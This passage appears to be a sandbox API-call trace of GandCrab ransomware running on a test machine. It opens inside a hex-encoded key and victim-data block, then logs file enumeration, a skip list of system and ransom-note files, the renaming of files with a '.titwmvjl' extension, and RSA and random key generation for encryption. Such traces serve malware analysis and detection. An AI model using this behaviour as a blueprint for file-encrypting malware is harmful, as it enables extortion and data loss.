70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.780] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0072.781] CloseHandle (hObject=0x2c4) returned 1 [0072.781] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.781] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.781] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x5a)) [0072.782] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.782] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.782] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.782] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.782] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0072.784] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.784] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.785] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned 62 [0072.785] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0072.785] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503938 [0072.785] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.785] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.785] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.785] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.785] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.785] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.785] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock" [0072.785] lstrlenW (lpString=".titwmvjl") returned 9 [0072.785] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.785] VirtualAlloc (lpAddress=0x0, dwSize=0xec, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.786] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 95 [0072.786] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\d2ca4a09d2ca4deb61a.lock") returned 86 [0072.786] lstrlenW (lpString=".lock") returned 5 [0072.786] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.786] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.786] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.786] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.786] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.786] lstrcmpW (lpString1="Database1.LNK", lpString2=".") returned 1 [0072.786] lstrcmpW (lpString1="Database1.LNK", lpString2="..") returned 1 [0072.787] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Database1.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK" [0072.787] lstrlenW (lpString=".titwmvjl") returned 9 [0072.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned 75 [0072.787] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.787] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK.titwmvjl") returned 84 [0072.787] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK") returned 75 [0072.787] lstrlenW (lpString=".LNK") returned 4 [0072.787] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.787] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".LNK ") returned 5 [0072.787] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.787] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.788] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.788] lstrcmpW (lpString1="Documents.LNK", lpString2=".") returned 1 [0072.788] lstrcmpW (lpString1="Documents.LNK", lpString2="..") returned 1 [0072.788] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Documents.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK" [0072.788] lstrlenW (lpString=".titwmvjl") returned 9 [0072.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned 75 [0072.788] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.788] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK.titwmvjl") returned 84 [0072.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK") returned 75 [0072.788] lstrlenW (lpString=".LNK") returned 4 [0072.788] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.788] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".LNK ") returned 5 [0072.788] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.789] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.789] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.789] lstrcmpW (lpString1="Global.LNK", lpString2=".") returned 1 [0072.789] lstrcmpW (lpString1="Global.LNK", lpString2="..") returned 1 [0072.789] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="Global.LNK" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" [0072.789] lstrlenW (lpString=".titwmvjl") returned 9 [0072.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 72 [0072.789] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.789] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK.titwmvjl") returned 81 [0072.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK") returned 72 [0072.789] lstrlenW (lpString=".LNK") returned 4 [0072.789] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.790] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".LNK ") returned 5 [0072.790] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.790] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.790] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0072.790] lstrcmpW (lpString1="index.dat", lpString2=".") returned 1 [0072.790] lstrcmpW (lpString1="index.dat", lpString2="..") returned 1 [0072.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2="index.dat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" [0072.790] lstrlenW (lpString=".titwmvjl") returned 9 [0072.790] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0072.790] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.791] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.titwmvjl") returned 80 [0072.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0072.791] lstrlenW (lpString=".dat") returned 4 [0072.791] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.791] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".dat ") returned 5 [0072.791] lstrcmpiW (lpString1=".dat", lpString2=".titwmvjl") returned -1 [0072.791] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0072.791] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0072.791] lstrcmpiW (lpString1="index.dat", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="KRAB-DECRYPT.html") returned -1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="CRAB-DECRYPT.html") returned 1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="KRAB-DECRYPT.txt") returned -1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="CRAB-DECRYPT.txt") returned 1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="ntldr") returned -1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="NTDETECT.COM") returned -1 [0072.792] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0072.792] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat") returned 71 [0072.792] lstrlenW (lpString=".dat") returned 4 [0072.792] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.792] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".dat ") returned 5 [0072.792] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.792] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.792] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0072.794] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0072.794] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.794] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0072.794] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.795] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.795] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.795] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0072.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.795] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.795] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.795] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.795] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0072.796] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0072.796] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0072.796] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0072.796] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0072.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.797] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.797] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.797] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0072.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.798] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034b8) returned 1 [0072.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.798] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0072.798] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.798] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0072.799] GetLastError () returned 0x0 [0072.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.799] CryptDestroyKey (hKey=0x5034b8) returned 1 [0072.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.799] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0072.799] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.799] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0072.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.800] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5034b8) returned 1 [0072.800] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0072.800] CryptGetKeyParam (in: hKey=0x5034b8, 